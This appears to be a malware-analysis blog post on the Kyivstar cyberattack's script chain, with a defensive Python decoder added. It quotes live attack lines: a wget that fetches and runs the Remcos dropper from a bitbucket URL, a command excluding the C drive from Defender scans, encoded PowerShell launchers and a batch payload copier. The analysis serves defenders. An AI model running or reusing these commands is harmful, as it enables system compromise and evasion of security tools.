Ky1vstar cyberattack - under the hood of the malicious scripts

The attack overview

In mid-December, it was revealed that a devastating cyberattack hit Ukr@ine's biggest telecommunications company. The attack disabled the company's services for days (!), leaving over twenty million Ukrainians without mobile communication and internet access.

Ukrainian officials described the attack as having disastrous consequences, causing the complete destruction of the telecoms operator's core infrastructure. The attackers managed to wipe out nearly all data, including thousands of virtual servers and PCs.

Below, you can see the attack chain, which begins with receiving a phishing email containing a malicious .zip attachment with a .doc file inside. 

email => attach1.zip => attach1.rar + attach2.rar => attach.rar (password protected) => .doc (vba) => SMB \\89_23_98_22\LN\GB.exe => powershell bitbucket_org/.../wsuscr.exe

The .doc file merely shows a picture that prompts the potential victim to enable editing and content - in other words, to lower security settings and permit the execution of a malicious macro.

To evade anti-malware checks on the email server and victim's system, the doc file is packed into a multi-layered, password-protected archive. It contains a VBA macro that initiates the infection process by executing the malware downloader.

Below you can see the detailed (trimmed for clarity) execution flow.

As you can see, the attackers actively use cmd and PS scripts to initiate malicious actions from trusted processes. These scripts are either fully or partially encoded and may contain packed data. To run PS scripts from cmd, the following command construction is used.

powershell -Command "[System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('...')) | Invoke-Expression"

To evade detection, the PS script to be executed is base64 encoded. The batch file passes the encoded script to PowerShell, instructing it to decode it on-the-fly via the command line rather than saving the script to disk.
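As an added example (not part of the original write-up), the following Python triage helper pulls the base64 blob out of this construction, decodes it with the codec named in the GetString call (Unicode means UTF-16LE), and flags indicators seen elsewhere in this chain. The sample batch line it decodes is constructed here and is not the original payload.

```python
import base64
import re

# Captures the decode-and-run construction used in the batch files:
# [...Encoding]::<enc>.GetString([System.Convert]::FromBase64String('<blob>')) | Invoke-Expression
_ENCODED_CALL = re.compile(
    r"(?:Encoding\]::(?P<enc>Unicode|UTF8|ASCII|UTF32)\.GetString\()?\s*"
    r"\[(?:System\.)?Convert\]::FromBase64String\(\s*['\"](?P<b64>[A-Za-z0-9+/=\s]*)['\"]",
    re.IGNORECASE,
)
# .NET encoding name -> Python codec; Unicode.GetString means UTF-16LE
_CODECS = {"unicode": "utf-16-le", "utf8": "utf-8", "ascii": "ascii", "utf32": "utf-32-le"}

# Substrings a defender would flag in the decoded text (all appear in this chain)
INDICATORS = {
    "Invoke-Expression": "decoded text is piped straight back into the interpreter",
    "Add-MpPreference": "changes Windows Defender preferences",
    "-ExclusionPath": "adds a Defender scan exclusion",
    "$env:APPDATA": "drops or launches a payload from the user profile",
}

def decode_embedded_powershell(text: str) -> list[str]:
    """Return the decoded script for each FromBase64String('...') blob in a command line or .bat."""
    scripts = []
    for m in _ENCODED_CALL.finditer(text):
        blob = re.sub(r"\s+", "", m.group("b64"))
        codec = _CODECS.get((m.group("enc") or "unicode").lower(), "utf-16-le")
        try:
            raw = base64.b64decode(blob, validate=True)
        except ValueError:
            scripts.append(f"<undecodable base64: {blob[:12]}...>")  # truncated or garbled blob
            continue
        # errors="replace" keeps the output readable when a blob was cut short (odd byte count)
        scripts.append(raw.decode(codec, errors="replace"))
    return scripts

def triage(text: str) -> dict:
    """Decode every embedded script and report which indicators appear in the clear text."""
    decoded = decode_embedded_powershell(text)
    haystack = "\n".join([text] + decoded).lower()
    hits = sorted(name for name in INDICATORS if name.lower() in haystack)
    return {"decoded_scripts": decoded, "indicators": hits}

# Constructed sample (not the original payload): the res.bat construction carrying the
# Defender-exclusion one-liner shown later in the article.
_SAMPLE_SCRIPT = 'Add-MpPreference -ExclusionPath C:\\'
SAMPLE_BAT_LINE = (
    'powershell -Command "[System.Text.Encoding]::Unicode.GetString([System.Convert]'
    "::FromBase64String('" + base64.b64encode(_SAMPLE_SCRIPT.encode("utf-16-le")).decode() + "'))"
    ' | Invoke-Expression"'
)

if __name__ == "__main__":
    for script in decode_embedded_powershell(SAMPLE_BAT_LINE):
        print(script)
    print(triage(SAMPLE_BAT_LINE)["indicators"])
```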

Exploring the scripts

After decompressing the final RAR archive, the victim opens the malicious .doc file containing a malicious VBA macro. We can extract it using two tools: Frank Boldewin's OfficeMalScanner and Didier Stevens' oledump. Let's take a look at both.

> OfficeMalScanner.exe C:\Test\malicious.doc info

This command dumps macros into the MALICIOUS.DOC-Macros folder. To obtain oledump, we need to install it using the "pip install olefile" command.

Next, dump the document structure.

We're interested in the streams marked with M, where macros are stored in a compressed state. The following command decompresses the macro located in the 9th stream.

oledump.py -s 9 --vbadecompressskipattributes C:\Test\malicious.doc >C:\Test\s9_malicious_doc.txt

This macro, shown in the picture below, serves only one purpose: to download and run the malware downloader GB.exe from the SMB share. Before doing so, it also opens the shared folder in a new Explorer window and closes it after execution.

The process tree.
The downloader GB.exe drops the res.bat and executes commands from it.

:: Download test2.exe from the share to the local folder without any messages
echo f | xcopy /s test2.exe "%temp%\persistent2\test2.exe" >NUL

:: Execute an encoded PS script
powershell -Command "[System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('ZgAA==')) | Invoke-Expression"

This bat file copies another executable, test2.exe, from the share and executes an encoded PS script. The bypass commands within the script body are packed.

This PS script implements an interesting UAC bypass trick using the Fodhelper binary in just three commands, and then executes the downloaded Remcos executable with elevated privileges. The unpacked cmd elevation commands appear as follows.

As we can see from the malware execution flow picture above, the downloader also runs another executable, test2.exe, in addition to executing res.bat.

> cmd.exe /c res.bat && test2.exe

This test2 executable runs another interesting batch file named test2.bat.

It runs another PS script designed to add the entire C drive to Defender's exclusion list, which requires admin rights. As usual, the commands are base64 encoded.

$pwd = "Add-MpPreference -ExclusionPath C:\"
$pwd | Invoke-Expression

This execution chain ends with the launch of the Remcos dropper named wsuscr.exe by the aforementioned PS script.

wget "https://bitbucket.org/olegovich-007/777/downloads/wsuscr.exe" -outfile "$env:APPDATA\wsuscr.exe"

Invoke-Expression -Command "$env:APPDATA\wsuscr.exe"

Remcos serves as a backdoor, granting attackers full access to the compromised system.

References

https://cert.gov.ua/article/6276824

https://github.com/winscripting/UAC-bypass/blob/master/FodhelperBypass.ps1

https://www.joesandbox.com/analysis/1365471/0/html

https://www.reuters.com/world/europe/russian-hackers-were-inside-ukraine-telecoms-giant-months-cyber-spy-chief-2024-01-04/

https://www.hybrid-analysis.com/sample/d698994e527111a6ddd590e09ddf08322d54b82302e881f5f27e3f5d5368829c/658988e479a329c125013938

https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Article Link: A blog about rootkits research and the Windows kernel: Ky1vstar cyberattack - under the hood of the malicious scripts